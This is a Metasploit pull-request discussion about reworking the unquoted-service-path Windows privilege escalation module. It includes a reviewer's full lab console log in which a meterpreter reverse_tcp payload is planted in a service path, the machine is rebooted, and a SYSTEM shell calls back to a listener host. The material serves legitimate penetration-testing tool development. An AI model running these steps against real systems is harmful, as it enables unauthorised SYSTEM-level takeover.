Updates to Trusted Service Path (now Unquoted Service path)

[h00die]

Fixes #11319

@sinn3r a long while ago wrote this local exploit. Seems to be quite popular on EDB (110+ vuln applications). When it was originally written, most likely against XP, permissions on the filesystem were much more relaxed, and writing to C:\ was easy. Win7+ changed that, so the logic now is reversed where we try the longest path FIRST and work our way to the shortest, and keep trying w/o giving up.

Changes:

1. Try multiple paths instead of giving up after the first one
2. Attempt longest to shortest, instead of shortest to longest
3. leave payload on disk since many times we're unable to restart the service (but a system reboot or service restart will exploit the box)
4. Rename to the current naming methodology, which seems to be more popular
5. add docs

[smcintyre-r7]

I don't know about that check method... It's only enumerating services and looking for a vulnerable one which seems like half the puzzle. Based on your exploitation logic, you also need a writable path. I'd like to see the check method updated to either:

• Not return CheckCode::Vulnerable unless we're certain that's accurate
• Find a writable path. This could be a bit trickier due to Windows permissions, groups and what not. A simple check could look for global write, but that would miss permission based checks that might include a group the session is currently running in the context of.

Thoughts?

[h00die]

On Linux there's a writable? post function. Maybe it's time to make an equivalent...

[h00die]

Updates:

1. There's now a windows version of writable?, since permissions are wonky, I decided to just write a file, print it, and delete it.
2. sinn3r had a 'quick' variable that wasn't really used. He only used the first service. I've now added that as an option so it exploits the first service in the first writable directory. Otherwise, it will try them all!!!
3. updated check codes since we now have writable? so that it is testing writability too.

@smcintyre-r7 I think this is ready for review again

[h00die]

also resolved a bug in the check command. tested on set quick false which works as well, just much slower.

[smcintyre-r7]

Tested successfully on Windows 10 x64 build 10586. I followed the steps from the Medium article to create a vulnerable environment. I'll have this landed shortly, thanks @h00die this is a stellar improvement!

msf5 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: DESKTOP-R9TM84E\sumit
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background 
[*] Backgrounding session 5...
msf5 payload(windows/meterpreter/reverse_tcp) > previous 
msf5 exploit(windows/local/unquoted_service_path) > show options 

Module options (exploit/windows/local/unquoted_service_path):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   QUICK    true             no        Stop at first vulnerable service found
   SESSION  -1               yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf5 exploit(windows/local/unquoted_service_path) > check
[+] The target is vulnerable.
msf5 exploit(windows/local/unquoted_service_path) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Finding a vulnerable service...
[*] Attempting exploitation of Some Vulnerable Service
[*] Placing C:\Program Files\A Subfolder\B.exe for Some Vulnerable Service
[*] Attempting to write 15872 bytes to C:\Program Files\A Subfolder\B.exe...
[+] Manual cleanup of C:\Program Files\A Subfolder\B.exe is required due to a potential reboot for exploitation.
[+] Successfully wrote payload
[*] Launching service Some Vulnerable Service...
[*] Manual cleanup of the payload file is required. Some Vulnerable Service will fail to start as long as the payload remains on disk.
[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/unquoted_service_path) > previous 
msf5 payload(windows/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 7
msf5 payload(windows/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf5 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > shell
Process 1752 created.
Channel 6 created.
Microsoft Windows [Version 10.0.10586]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\sumit\Desktop>shutdown /r /t 0

[*] 192.168.159.165 - Meterpreter session 5 closed.  Reason: Died


Terminate channel 6? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Operation timed out.
msf5 payload(windows/meterpreter/reverse_tcp) > 
[*] Sending stage (180291 bytes) to 192.168.159.165
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.165:49670) at 2020-04-16 11:26:16 -0400

msf5 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 6...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > 

[tperry-r7]

Release Notes

The module modules/exploits/windows/local/unquoted_service_path was updated to allow you try multiple paths, attempt longest to shortest and leave the payload on the disk.